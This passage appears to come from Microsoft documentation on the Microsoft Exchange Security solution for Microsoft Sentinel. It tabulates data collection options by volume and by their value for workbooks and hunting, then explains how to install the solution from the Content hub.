Monitoring activities on mailboxes, and especially on designated VIP mailboxes (screenshot omitted).

Data ingestion

To keep the solution cost-effective, you can select the level of data you wish to collect from your environment: the more data you collect, the more detection scenarios you can enable. To help you pick the right collection level, refer to this table:

Option  Data to upload                                               Volume          Value for workbooks  Value for hunting
0       Configuration script results                                 Low             High                 Low
1       Exchange-related event logs of Exchange servers              Medium          Medium               Medium
2       Security/Application/System event logs of Exchange servers  Medium          Low to Medium        Medium
3       Security logs of domain controllers in the Exchange sites    Medium to High  Low to Medium        Medium
4       Security logs of all domain controllers                      High            Low to Medium        Medium to High
5       IIS logs of Exchange servers                                 High            Low                  High
6       Message tracking logs of all Exchange servers                High            Low                  Low to Medium
7       HTTP proxy logs of all Exchange servers                      High            High                 High

Except for collection option 0, all options are independent of one another. They are deployed as Microsoft Sentinel data connectors using data collection rules (DCRs) or the Azure Monitor Agent, and you can activate or deactivate each option whenever you want.

Get started!

Connect to your Microsoft Sentinel workspace, open the Content hub blade, and search for Microsoft Exchange Security (screenshot omitted).

Review the details and click Install to get started!

Alternatively, you can navigate to the respective solutions landing page in Azure: